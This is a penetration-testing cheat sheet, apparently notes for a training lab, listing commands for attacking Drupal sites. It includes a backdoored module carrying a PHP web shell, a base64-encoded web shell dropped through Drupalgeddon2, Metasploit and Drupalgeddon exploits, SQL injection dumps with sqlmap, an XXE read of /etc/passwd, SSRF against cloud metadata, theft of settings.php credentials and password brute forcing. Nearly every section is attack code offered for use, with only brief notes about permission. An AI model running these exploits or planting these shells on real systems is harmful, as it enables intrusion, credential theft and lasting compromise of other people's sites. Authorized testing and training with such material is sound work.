# 6. Attacking Drupal

### 1. PHP Filter Module Exploitation (Drupal < 8)

```sh
curl -s http://drupal-qa.inlanefreight.local/node/3?dcfdd5e021a869fcc6dfaef8bf31377e=id
```

* Enable PHP filter module, inject code via content.
* **Consideration:** Client communication before enabling modules.

### 2. Backdoored Module Upload

```sh
wget --no-check-certificate https://ftp.drupal.org/files/projects/captcha-8.x-1.2.tar.gz
tar xvf captcha-8.x-1.2.tar.gz
echo '<?php system($_GET[fe8edbabc5c5c9b7b764504cd22b17af]);?>' > captcha/shell.php
echo '<IfModule mod_rewrite.c>RewriteEngine On;RewriteBase /</IfModule>' > captcha/.htaccess
tar cvf captcha.tar.gz captcha/captcha/
curl -s drupal.inlanefreight.local/modules/captcha/shell.php?fe8edbabc5c5c9b7b764504cd22b17af=id
```

* Upload malicious module via admin panel.
* **Consideration:** Avoid modifying production systems without explicit permission.

### 3. Drupalgeddon (CVE-2014-3704)

```sh
python2.7 drupalgeddon.py -t http://drupal-qa.inlanefreight.local -u hacker -p pwnd
```

* Create admin user via SQL injection.
* **Consideration:** Impact of creating unauthorized admin accounts.

### 4. Drupalgeddon2 (CVE-2018-7600)

```sh
python3 drupalgeddon2.py
echo "PD9waHAgc3lzdGVtKCRfR0VUW2ZlOGVkYmFiYzVjNWM5YjdiNzY0NTA0Y2QyMmIxN2FmXSk7Pz4K" | base64 -d | tee mrb3n.php
curl http://drupal-dev.inlanefreight.local/mrb3n.php?fe8edbabc5c5c9b7b764504cd22b17af=id
```

* RCE via user registration form.
* **Consideration:** Severity of unauthenticated RCE vulnerabilities.

### 5. Drupalgeddon3 (CVE-2018-7602)

```sh
msf6 > use exploit/multi/http/drupal_drupageddon3
msf6 > set rhosts 10.129.42.195
msf6 > set VHOST drupal-acc.inlanefreight.local
msf6 > set drupal_session SESS...
msf6 > set DRUPAL_NODE 1
msf6 > set LHOST 10.10.14.15
msf6 > exploit
```

* RCE via Form API (requires authenticated session).
* **Consideration:** Session hijacking risks.

### 6. Drupal Configuration File Exploitation/Security

```sh
curl -s http://drupal.inlanefreight.local/sites/default/settings.php
ls -l sites/default/settings.php
cat .htaccess
```

* Check for exposed settings.php, extract database credentials.
* **Consideration:** Secure configuration file permissions and access.

### 7. Database Exploitation (SQL Injection - Expanded)

```sh
curl "http://drupal.inlanefreight.local/node/1?id=1'--"
curl "http://drupal.inlanefreight.local/node/1?id=1' OR '1'='1"
sqlmap -u "http://drupal.inlanefreight.local/node/1?id=1" --dbs --batch
sqlmap -u "http://drupal.inlanefreight.local/node/1?id=1" -D [database_name] --tables --batch
sqlmap -u "http://drupal.inlanefreight.local/node/1?id=1" -D [database_name] -T [table_name] --columns --batch
sqlmap -u "http://drupal.inlanefreight.local/node/1?id=1" -D [database_name] -T [table_name] -C [column1,column2] --dump --batch
sqlmap -u "http://drupal.inlanefreight.local/node/1?id=1" --level 5 --risk 3
```

* Manual and automated SQL injection testing.
* **Consideration:** Validate findings with alternative tools.

### 8. Form API Exploitation

```sh
curl -X POST -d "param1=value1&param2=payload" http://drupal.inlanefreight.local/form_path
```

* **Consideration:** Burp Suite is very helpful for deeper analysis.

### 9. File Upload Vulnerabilities

```sh
curl -F "file=@malicious.php" http://drupal.inlanefreight.local/upload_path
```

* Test various file extensions.
* **Consideration:** Look for MIME type enforcement.

### 10. Access Control Vulnerabilities

```sh
curl -I http://drupal.inlanefreight.local/admin
```

* Check for 200 response when not authenticated.
* **Consideration:** Test different user roles.

### 11. Session Management Vulnerabilities

* Use Burp Suite's Sequencer and Session handling rules.

### 12. XML External Entity (XXE) Injection

```sh
curl -X POST -H "Content-Type: application/xml" -d '<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]><foo>&xxe;</foo>' http://drupal.inlanefreight.local/xml_endpoint
```

### 13. Server-Side Request Forgery (SSRF)

```sh
curl "http://drupal.inlanefreight.local/page?url=http://169.254.169.254/latest/meta-data/"
```

* **Consideration:** Check response for internal metadata leaks.

### 14. Drupal Brute Forcing

```sh
wpscan --url http://drupal.inlanefreight.local/ --enumerate u --passwords /usr/share/wordlists/rockyou.txt
hydra -l admin -P /usr/share/wordlists/rockyou.txt drupal.inlanefreight.local http-post-form "/user/login:name=^USER^&pass=^PASS^&form_id=user_login:Invalid username or password"
```

* **Consideration:** Use specific tools for Drupal authentication mechanisms.

### Additional Notes:

* **Ensure Drupal versions are known before testing specific exploits.**
* **Use enumeration tools like droopescan for discovering modules and themes.**
* **Test patches and mitigations post-exploitation to ensure security fixes.**